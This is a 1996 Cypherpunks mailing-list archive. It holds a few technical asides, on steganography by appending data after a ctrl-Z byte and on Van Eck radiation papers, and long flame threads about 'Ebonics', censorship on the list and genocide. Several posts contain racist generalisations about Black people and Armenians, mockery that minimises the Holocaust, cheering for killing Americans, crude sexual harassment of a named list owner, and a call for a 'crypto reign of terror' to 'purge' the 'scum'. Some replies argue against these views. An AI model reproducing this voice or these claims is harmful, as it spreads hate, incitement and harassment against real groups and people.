 violations of international copyright law.

-----

 WIP_out

----------

WIPO on the Web:

 http://www.wipo.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Sat, 21 Dec 1996 08:54:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Proof that "cypher punks" have complete degenerated...
Message-ID: <3.0.32.19961220092344.0068c554@best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:08 AM 12/19/96 -0800, you wrote:
>geeman@best.com wrote:
>> It wasn't worth commenting on.
>> Appending data after the ctrl-Z as stego?
>> Not even worth a letter to the ed!
>
>> Dr.Dimitri Vulis KOTM wrote:
>> > No one even commented on the latest Dr. Dobbs issue.
>
>After seeing the initial post, I ran out to get a copy, but they were
>all gone.  I find it hard to believe that appending data to a file is
>considered stego, even by a commercial publication such as Dr. Dobb's.
>Can anyone confirm this?
>

Well, there it is, indeed.  I couldn't friggin believe it, since I've
written for them and usually the stuff's pretty good.  A program to 
append data after a text file's ctrl-Z EOF byte.  If you _really_
want it secure, crypt it with the compiler's PRNG.  ;)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 09:04:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Ebonic Plague
In-Reply-To: <v03007801aee10fd61030@[207.167.93.63]>
Message-ID: <v03007800aee1c8688dfe@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 PM -0800 12/20/96, Mike Duvos wrote:

>When I read Tim's original message on "Ebonics", I thought it was one
>of those witty parodies he occasionally comes up with.

Thanks for the compliment! The "Ebonics" notion is too strange for my
imagination to have come up with, though.


>Then I turned on the NBC Nightly News, and lo and behold, "Ebonics"
>was one of the featured stories, replete with commentary by former
>New York mayor Ed Koch.

Indeed, the Oakland, California school system is teaching children in a
"bilingual" program of "standard English" and "Ebonics." At least Ebonics
is simpler: I be, you be, he be, she be, we be, dey be, it be, etc.

So, how long before a lawsuit is filed ("it be filed") demanding that
election ballots be printed in Ebonics, along with those printed in
Spanish, Mandarin, Cantonese, Vietnamese, Korean, Serbo-Croation,
Blatislavan, Talegu, and the other 43 officially recognized languages?

How long before it becomes a crime to "discriminate" (or, in Ebonics,
"discimnate") against a person ("a peeples") who speaks Ebonics as his
primary language?

Democracy has run amok in this country. There is no hope for reforming at
the ballot box, as democracy only makes things worse. Only a crypto reign
of terror can purge this land of the scum.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey A Nimmo <janimmo@rigel.infonex.com>
Date: Sat, 21 Dec 1996 09:22:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Slaughter
In-Reply-To: <32BBF98E.4D51@sk.sympatico.ca>
Message-ID: <Pine.SOL.3.91.961221091226.2763B-100000@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 21 Dec 1996, Carl Johnson wrote:

>    "They came for the Jews, and I wasn't a Jew, so I didn't speak up.
> They came for the National Socialists, and I wasn't a National Socialist,
> so I didn't speak up.  Then they came for me.
>    "And nobody spoke up."

"They" came for the Jews AND the Nazis? Damn, they wanted to cover all
the bases didn't they?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 07:10:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <32BB9372.78B0@qnis.net>
Message-ID: <L1iaZD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Vangelis <vangelis@qnis.net> writes:

> Dr.Dimitri Vulis KOTM wrote:
> > > Umm.. tried to get on a flight without having ID lately?  Doesn't work -
> > > against policy.  Anti-terrorism policy and all.. it's for your own
> > > safety, of course.
> >
> > It's funny that this particulae piece of fascist regulation was imposed
> > by the Klintons after the TWA 800 crash. Now the most likely reasons for
>
> Um, not it wasn't.  Not that I wouldn't put it past them, but I read a
> 1st-hand account of someone having this problem months before TWA 800
> took a bath.

Yes it was.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 07:10:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Your password for BARRON'S Online
In-Reply-To: <Pine.SOL.3.94.961221124430.25336A-100000@ritsec1.com.eg>
Message-ID: <2BJaZD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ABB Electrical Engineering  <abbee@ritsec1.com.eg> writes:

> Can anyone  tell me please how to unsbscribe and not to receive such mail.

What's ".eg"?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 07:10:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Cypher punks" are the laughing stock for the media
In-Reply-To: <32BBF98E.4D51@sk.sympatico.ca>
Message-ID: <mTJaZD34w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson <toto@sk.sympatico.ca> writes:

>    Thank you for your lengthy list of articles on the human slaughter
> that continues on earth to this very day.  It reminds me of watching
> the TV coverage of Desert Storm, as the news channels took great
> delight in replaying scenes of American flyers massacring retreating
> Iraquian troops who were beaten and bedraggled, merely trying to
> survive, and get home to their families.

I wish Iraqi people the best of luck in killing every American they can get
their hands on. Three cheers for Saddam Hussein!

>   You are free to rail night and day against cryptology and cypherpunks,
> and whoever else it pleases you to rail against, because this is America.

You are sadly mistaken, child, or maybe you believe the lies Timmy May (fart)
spread about me. I am a professional cryptographer. I believe that crypto
technology should be freely availably to everyone, with no government controls,
like any other technology (like compiler construction :-). I believe that the
Internet should be available to everyone (and I've made a lot of enemies by
helping connect certain parts of the world to the 'net somewhat sooner that
they would have been without my participation). OTOH, "cypher punks" are a
joke, a laughing stock for the media, who stand in the way of these goals.
Re-read the list archives before speaking of things you do not understand.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 21 Dec 1996 09:44:02 -0800 (PST)
To: Carl Johnson <toto@sk.sympatico.ca>
Subject: Re: Slaughter
In-Reply-To: <aVL0yD28w165w@bwalk.dm.com>
Message-ID: <32BC218C.1B92@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson wrote:
> Dr.Dimitri Vulis KOTM wrote:
> Dear Dr.DVK,
>    Thank you for your lengthy list of articles on the human slaughter[snippo]
>    There is a quote I remember which struck me deeply when I heard it,
> but forgive me if it is not quite correct:
>    "They came for the Jews, and I wasn't a Jew, so I didn't speak up.
> They came for the National Socialists, and I wasn't a National Socialist,
> so I didn't speak up.  Then they came for me. "And nobody spoke up."

As I remember the quote, it ended something like "and they came for me,
but there was nobody left to speak up".

[mo' snip]

> "You will take my cryptography from me when you pry it from my
> cold, dead algorithms."  Think about cryptography.

We're all thinking about it.  We just don't believe (naively) that just
because someone issues code that was designed 20 years ago, and which
the NSA can undoubtedly crack in a heartbeat, that that code can
necessarily protect us against all comers.

There is a difference between principle and fact.  You have the
principles exactly correct, but as to facts, you have to be eternally
vigilant, i.e., don't get too comfortable with PGP et al.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 07:10:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Instruction Sets which are tough to emulate
In-Reply-To: <v02140b00aee102e02f71@[192.0.2.1]>
Message-ID: <uckaZD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ph@netcom.com (Peter Hendrickson) writes:

> I'm guessing there are a bunch of ways to make a processor hard
> to emulate.
>
> For instance, you can make the registers 65 bits wide.
>
> Can anybody think of some more?

Why would 65 bit registers make the processor hard(er) to emulate?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 07:10:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Life with Dale
In-Reply-To: <v03007800aee11abb9f9e@[207.167.93.63]>
Message-ID: <NgkaZD37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> (Not an altogether surprising sentiment, but one has to wonder just why
> Dale would be on a list such as this one, given his politics.)

Has the asshole censor John Gilmore (spit) "unsuscripted" Dale yet?

Does John Gilmore (spit) masturbate every time he "unsubsides" someone
from his private mailing list for posting content he doesn't like?

Does John Gilmore (spit) keep a bowl of condoms next to toad.com, or does
he practice Unsafe Sex with himself?

Inquiring minds want to know.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 21 Dec 1996 09:56:18 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Life with Dale
In-Reply-To: <NgkaZD37w165w@bwalk.dm.com>
Message-ID: <32BC246D.67C6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> "Timothy C. May" <tcmay@got.net> writes:
> > (Not an altogether surprising sentiment, but one has to wonder just why
> > Dale would be on a list such as this one, given his politics.)

[snip]

A list such as this? I hung out with the radicals at Kent State in 1970,
hobnobbed with KKK guys in S.E. Tennessee, spent time with the ultra-
liberal crowd in the west L.A. area, and associated with Liberty Lobby
(Carto, IHR) people for a while as well.

You might be surprised at my politics, but then again, what is my
politics?  You can select/accumulate a point of view, but I'll wager
that you can get a better understanding of people of all stripes if
you spend time with them, rather than reading about them.  Ideas are
important, they're great to have and believe in, but don't let ideas
lead you into supporting the great massacre machine of current-day
politics.  It's a fool's bet.

Uncle Miltie said it best at the end of a 90-minute comedy special on
PBS:  "What's it all about?  Life."  (followed by an extremely funny
quip about an uncle doing life in Sing-Sing).  God bless Uncle Miltie.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 07:20:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dale defends free society from the NSApunks (was Re: Encryption ?
In-Reply-To: <199612211212.HAA13448@dhp.com>
Message-ID: <1wkaZD39w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


lucifer@dhp.com (Anonymous) writes:

> :There are a lot of NSA people here on cypherpunks, and they try very
> :hard to control encryption, to make everyone think it is difficult, to
> :discourage independent inquiry.
>
> They don't have to discourage anything, we never talk about encryption here..
> But thats the master plan, to bore them into leaving!!

And those who don't leave voluntarily get "unsubscrived" by the censor
asshole John Gilmore (spit) who doesn't like the content of their posts.

I figured out what gives John Gilmore's beard its fake "blonde" color -
                           the dried-up SEMEN.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 21 Dec 1996 10:10:21 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Ebonics
In-Reply-To: <v03007801aee10fd61030@[207.167.93.63]>
Message-ID: <32BC27B3.7E2D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 9:15 PM -0600 12/20/96, Matthew J. Miszewski wrote:
> >Jesus Tim.  You're letting your lilly white show.
> >-feeling-oppressed-by-every-law-in-existance-white-boy
> Yeah, Matt, in a free society I wouldn't have to "speak Ebonics."

The trouble with these f*&%^*&%^* do-gooder programs is that they
miss the point.  How are you going to teach anything using improvised
dialect?  It's just insane.

When I was working at Olympic Sales in El Segundo in 1981, my manager
was a very intelligent and very politically knowledgeable person. One
day I responded to something he said, where I said "shit, bro'" followed
by some jive talk like I've heard before, but couldn't really communicate
in, since I didn't have the experience.  To my surprise, he responded
with some more jive talk, and we traded jive for a minute or so until
I gave up.

It's something I'll never forget - gives me a good laugh whenever I
think about it.  But seriously, they're gonna codify this?  What bozos.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 21 Dec 1996 10:21:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Life with Dale
In-Reply-To: <199612210144.SAA25029@infowest.com>
Message-ID: <32BC2A60.5C63@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 7:55 PM -0800 12/20/96, Dale Thorn wrote:
> >Attila T. Hun wrote:

[snippo]

> Dale probably has a picture of her above his desk to remind him of
> why he supports the "license to breed" proposal.

I'm not into the breeding stuff, being that we had the requisite example
from Europe circa the 1930's.  That said, however, if society could 
"breed" a million more Jessicas, I would be delighted.

Ya' know, guys, the world is half women, even though they're not on
the c-punks list.  Get in touch with them.  They're fun people.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 08:10:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Securing ActiveX.
In-Reply-To: <851098860.921944.0@fatmans.demon.co.uk>
Message-ID: <4JmaZD41w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:

> > Armenians are murderous cowards. They killed over 2 million Moslems in
> > this century alone - mostly women and children.
>
> I note that along with this racist generalisation you decided to post the

"Generalisation"? It's a historical fact that Armenians have murdered
2,500,000 Turks, Kurds, and Sephardic Jews in this century alone.

]_The Jewish Times_ June 21, 1990
]
]_An appropriate analogy with the Jewish Holocaust might be the
] systematic extermination of the entire Muslim population of
] the independent republic of Armenia which consisted of at
] least 30-40 percent of the population of that republic. The
] memoirs of an Armenian army officer who participated in and
] eye-witnessed these atrocities was published in the U.S. in
] 1926 with the title 'Men Are Like That.' Other references abound._
]
] Leonard Ramsden Hartill, _Men Are Like That_ The Bobbs-Merrill
]                           Company, Indianapolis (1926).
]_Memoirs of an Armenian officer who participated in the Armenian
] genocide of 2.5 million Muslim people_
]
]
]_Foreword:_
]
]_For example, we were camped one night in a half-ruined Tartar
] mosque, the most habitable building of a destroyed village, near
] the border of Persia and Russian Armenia. During the course of
] evening I asked Ohanus if he could tell me anything of the history
] of the village and the cause of its destruction. In his matter of
] fact way he replied, Yes, I assisted in its sack and destruction,
] and witnessed the slaying of those whose bones you saw to-day
] scattered among its ruins._
]
]p. 218 (first and second paragraphs)
]
]_We Armenians did not spare the Muslims. If persisted in, the
] slaughtering of Tartars, the looting, and the rape and massacre
] of the helpless become commonplace actions expected and accepted
] as a matter of course.
]
] I have been on the scenes of massacres where the dead lay on the
] ground, in numbers, like the fallen leaves in a forest. Muslims
] had been as helpless and as defenseless as sheep. They had not died
] as soldiers die in the heat of battle, fired with ardor and courage,
] with weapons in their hands, and exchanging blow for blow. They had
] died as the helpless must, with their hearts and brains bursting
] with horror worse than death itself._

Next you'll say that Germans didn't kill 6 million Jews. (Of course, the
Nizkor project now claims that Germans killed 12 million Jews. Isn't
it remarkable how fast those pesky dead Jews can multiply? :-)

> following rant:
>
> >As usual, Timmy May spouts racist, anti-Semitic shit. As usual, he has
> >no idea what he's talking about. So what else is new...
>
> As well as a number of other rants along those lines. There is little
> difference between over generalisations of the kind you made above
> and, for example, discriminating against someone on the basis of
> race, colour, religion etc.

Interesting. Paul Bradley does not consider Timmy May's (fart) latest rants
on "ebonics" and "colored race" to be racist? I think Timmy May hates
blacks even more than he hates Jews. Let's quote Timmy's sick garbage on
soc.culture.african.american and ask if they find it offensive and racist.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 21 Dec 1996 11:04:44 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Ebonic Plague
In-Reply-To: <v03007800aee1c8688dfe@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.961221105730.1015C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


It was Hayek who wrote: "We have no intention, however, of making a 
fetish of democracy. It may well be true that our generation talks and 
thinks too much of democracy and too little of the values which it 
serves... Democracy is essentially a means, a utilitarian device for 
safeguarding internal peace and individual freedom. As such it is by no 
means infalliable or certain. Nor must we forget that there has often 
been much more cultural and spiritual freedom under an autocratic rule 
than under some democracies -- and it is at least conceivable that under 
the government of a very homogenous and doctrinare majority democractic 
government *might be as oppressive as the worst dictatorship.* [emphasis 
mine -DBM]."

-Declan


On Sat, 21 Dec 1996, Timothy C. May wrote:
> 
> Democracy has run amok in this country. There is no hope for reforming at
> the ballot box, as democracy only makes things worse. Only a crypto reign
> of terror can purge this land of the scum.


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Fri, 20 Dec 1996 14:08:09 -0800 (PST)
To: joelm@eskimo.com
Subject: Re: Van Eck articles
Message-ID: <85111967606165@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>Looking for:
>
>"Protective Measures Against Compromising Electromagnetic Radiation Emitted by
>Video Display Terminals" by Professor Erhard Moller, Aachen University, 1990
>(no source citation)
 
I have a copy of the original German version of this, I can snail mail a copy
if anyone wants to translate it.  It has lots of graphs and diagrams which
probably won't scan very well, and it will need translation before most of the
people on the list can make any use of it.  I know there are English versions
floating around, but I've never seen one.

BTW the work was done in the early '80's, not 1990.
 
Peter.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 09:10:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Cypher punks'" sexual preferences
In-Reply-To: <199612200356.TAA25114@mark.allyn.com>
Message-ID: <LFqaZD44w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Doctor: Do you know who gave you AIDS?
"Cypher punk": I don't have eyes on the back of my head.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sat, 21 Dec 1996 10:05:41 -0800 (PST)
To: "Matthew J. Miszewski" <tcmay@got.net>
Subject: Re: Ebonics
Message-ID: <199612211754.MAA04080@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> Yeah, Matt, in a free society I wouldn't have to "speak Ebonics."
> 
> (Personally, I interviewed several folks while I was at Intel who could
not
> speak standard English. I recommended against their hiring, and they in
> fact did not get invites to be interviewed at the main facilities. So
much
> for their jive talk habits.)
> 
> Understand, I have nothing against the colored people speaking "Ebonics"
to
> each other, or to anyone who'll listen. But I don't have to deal with
this
> nonsense, nor do I have to hire them.
> 
> (Until the People's Republic of Political Correctness demands that I
> "justify" why not speaking standard English is a "valid job requirement,"
> and refuses to take my "Because I say it is" as a valid answer. Not
> surprisingly, the Clintonistas have decided to enter the Proposition 209
> challenge on the side of the pro-discrimination side.)
> 
> If I were designing a genocidal program to destroy the colored race, I
> would be pushing for Ebonics, for encouraging coloreds to study "Human
> Potential" and "African History" instead of math, science, and
engineering,
> and pushing for hiring quotas.
> 
There are several problems with your argument:
	* You are making glaring generalizations regarding all members of an
ethnic body; you don't seem to realize that intellect is based not on color
or how you talk but on your brain (which has the same color and other basic
properties in all humans, I believe)
	* You are completely forgetting the other "non-English" group in America;
the so-called White Trash or heavy Southern accents, which are violate just
as many prissy and stuck up rules of grammar as Ebonics
	* You don't have to speak ebonics. You also don't have to speak with a
Southern twang (or whatever the politically correct name for that is)

	I also think that you are forgetting about the human aspect of your
discrimination. For a second, put yourself in the place of a really smart
black guy applying for a job at Intel. He is overqualified for the job. You
turn him down. Have you ever wondered what it does to a person to be turned
down not on the basis of their moral character or intellect but by their
skin? For someone to be told that they are stupid and are not competent to
do this job? You don't realize that you are crushing _human_ lives, people
who have feelings. If you would just put yourself in their place, you would
realize the hurt that your are inflicting.
	Out of curiousity, do you refuse from hiring people with Southern Accents?
Or people who have heavy "asian" accents? I'm very surprised that a smart
person like you, who believes in the power of strong cryptography, one of
the greatest equalizing forces in the world, actively discriminates against
other people who don't look or talk like you.

Mark Rosen
FireSoft - http://www.geocities.com/SiliconValley/Pines/2690
Mark Eats AOL - http://www.geocities.com/TimesSquare/6660




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ABB Electrical Engineering  <abbee@ritsec1.com.eg>
Date: Sat, 21 Dec 1996 02:44:07 -0800 (PST)
To: webmaster@Online.Barrons.COM
Subject: Re: Your password for BARRON'S Online
In-Reply-To: <199612171641.LAA29419@Online.Barrons.COM>
Message-ID: <Pine.SOL.3.94.961221124430.25336A-100000@ritsec1.com.eg>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone  tell me please how to unsbscribe and not to receive such mail.

Thanks 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 13:13:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: "the world is half women, even though they're not on the c-punkslist"
In-Reply-To: <199612210144.SAA25029@infowest.com>
Message-ID: <v03007800aee201b0d0e5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 AM -0800 12/21/96, Dale Thorn wrote:

>Ya' know, guys, the world is half women, even though they're not on
>the c-punks list.  Get in touch with them.  They're fun people.

Ah, it's been a while since we had the "why aren't more women on the list?"
discussion.

Frankly, women are of course welcome. If the list interests them, they are
welcome to subscribe. As it has always been.

That so few women are subscribers, or remain subscribers, or attend
Cypherpunks physical meetings....well, that's a larger issue involving
familiar issues:

- why are libertarian events so dominated by males? (in attendance, for
example)

- why do political extremist parties (Libertarian, Aryan Nations, JDL, KKK,
Wobblies, etc.) tend to be more attractive to men in general?

(While women are now well-integrated into the Democratic Party, and
increasingly into the Republican Party, they are severely underrepresented
in the various extremist and fringe parties noted above.)

- why do men get a charge out of the thought of "seeing the walls come
crashing down" as crypto methods undermine taxation, control of citizens,
etc., while most women seem _disturbed_ by the implications?

(I've explained crypto anarchy to many men and women over the past 6-8
years. I've seen the guy's get agitated, or bothered, but usually
_interested_. I've seen eyes light up as they understand the likely
implications of untraceable payments, anonymous communications, avoidance
of Big Brother, etc. But with almost all women who've been exposed to this
stuff, the reaction is negative, and one of disinterest. "Why would anyone
want anarchy?" is a common question. Sociologists and psychologists could
perhaps better explain why this is not a surprising reaction. I think it's
why we seem to have at most a couple of active women subscribers at any
given moment.)

So, Dale, feel free to recruit more women to this and other lists. But
don't presume from the traffic you see here--or from comments about the
utter stupidity of little Jessica Dubroff, her pilot, her parents, and the
complicitous news media--that we need a lecture on getting in touch with
women.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sat, 21 Dec 1996 14:31:08 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: The Ebonic Plague
Message-ID: <01BBEF4B.F9E5E740@king1-05.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Timothy C. May

Democracy has run amok in this country. There is no hope for reforming at
the ballot box, as democracy only makes things worse. Only a crypto reign
of terror can purge this land of the scum.
......................................................


Just how would this take shape in "real life" - what would constitute this reign of terror; how do you envision such an event in action?

And which are the scum who would be purged?  

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 21 Dec 1996 11:58:53 -0800 (PST)
To: mrosen@peganet.com>
Subject: Re: Ebonics
In-Reply-To: <199612211754.MAA04080@mercury.peganet.com>
Message-ID: <Pine.LNX.3.95.961221144523.595B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 21 Dec 1996, Mark Rosen wrote:

> There are several problems with your argument:
> 	* You are making glaring generalizations regarding all members of an
> ethnic body; you don't seem to realize that intellect is based not on color
> or how you talk but on your brain (which has the same color and other basic
> properties in all humans, I believe)

That would be your generalization.  Nowhere did anyone ever say that _all_
black people speak "Ebonics".  I don't see why someone should hire someone if
they can't even understand what that person is saying.  Besides, I would
suspect that a reasonably intelligent person would know how to speak correct
English or at least make an attempt to do so.

> 	* You are completely forgetting the other "non-English" group in America;
> the so-called White Trash or heavy Southern accents, which are violate just
> as many prissy and stuck up rules of grammar as Ebonics

No mention was made of "White Trash".  You're drawing an invalid conclusion.

> 	* You don't have to speak ebonics. You also don't have to speak with a
> Southern twang (or whatever the politically correct name for that is)

One also shouldn't have to hire such people either.

> 	I also think that you are forgetting about the human aspect of your
> discrimination. For a second, put yourself in the place of a really smart
> black guy applying for a job at Intel. He is overqualified for the job. You

There is a logical correlation between intelligence and being able to follow
English grammatical rules.

> turn him down. Have you ever wondered what it does to a person to be turned
> down not on the basis of their moral character or intellect but by their
> skin? For someone to be told that they are stupid and are not competent to
> do this job? You don't realize that you are crushing _human_ lives, people
> who have feelings. If you would just put yourself in their place, you would
> realize the hurt that your are inflicting.

This has nothing to do with race.  You are drawing another invalid conclusion.
It has to do with dealing with people who will speak in a language that one can
understand.  English grammar is not simple, but an intelligent person would
be able to at least grasp some of the basics of grammar and speak in a
comprehensible language.

> 	Out of curiousity, do you refuse from hiring people with Southern Accents?
> Or people who have heavy "asian" accents? I'm very surprised that a smart
> person like you, who believes in the power of strong cryptography, one of
> the greatest equalizing forces in the world, actively discriminates against
> other people who don't look or talk like you.

Crypto will allow people to actively discriminate against whomever they wish.
It will also allow those who would be discriminated against to protect
information about themselves to prevent discrimination.  I don't support
discrimination based on race, but language is a completely different matter.

P.S. Spelling and grammar flames will be ignored.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMrxCJyzIPc7jvyFpAQFm2gf/dqdYTicQskfQN2UVnBGs/BK5YD7+ylID
gk25Ki5ccPq08VhGCcoMRifWiJB3vauX+0dbhAVu5wkEUW9n2hAgpK3r3nuFH7r2
MAvPmMlRb0ro4Kd2EKoUHiRL2jzeJd5ztmuVRkBJ9A6Sp74xxM1JmMZMIFSS042m
GY4rMXpNL+Pg5u3DGLpXtFHJvber35tsEx1C5PTcLHhHnJF0bDCPE/i+wGM72kJ8
DpuVnnRHLT/vhm7nRoRIePvdXcYgkR5/1epQ9sefBn0eaQYCCqjtu26ASnhtPf6l
RjWH8neB7vGUqf9yxOhLnKOdTK8tfuQzkbfizYoncdzsKFbd1NRdVQ==
=F+mv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sat, 21 Dec 1996 12:27:32 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Ebonics
Message-ID: <199612212015.PAA09322@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> > There are several problems with your argument:
> > 	* You are making glaring generalizations regarding all members of an
> > ethnic body; you don't seem to realize that intellect is based not on
color
> > or how you talk but on your brain (which has the same color and other
basic
> > properties in all humans, I believe)
> 
> That would be your generalization.  Nowhere did anyone ever say that
_all_
> black people speak "Ebonics".  I don't see why someone should hire
someone if
> they can't even understand what that person is saying.  Besides, I would
> suspect that a reasonably intelligent person would know how to speak
correct
> English or at least make an attempt to do so.
	Especially in the computer field, language is irrelevant; as long as
someone can "speak" C++ or HTML, they're fine.

> > 	* You are completely forgetting the other "non-English" group in
America;
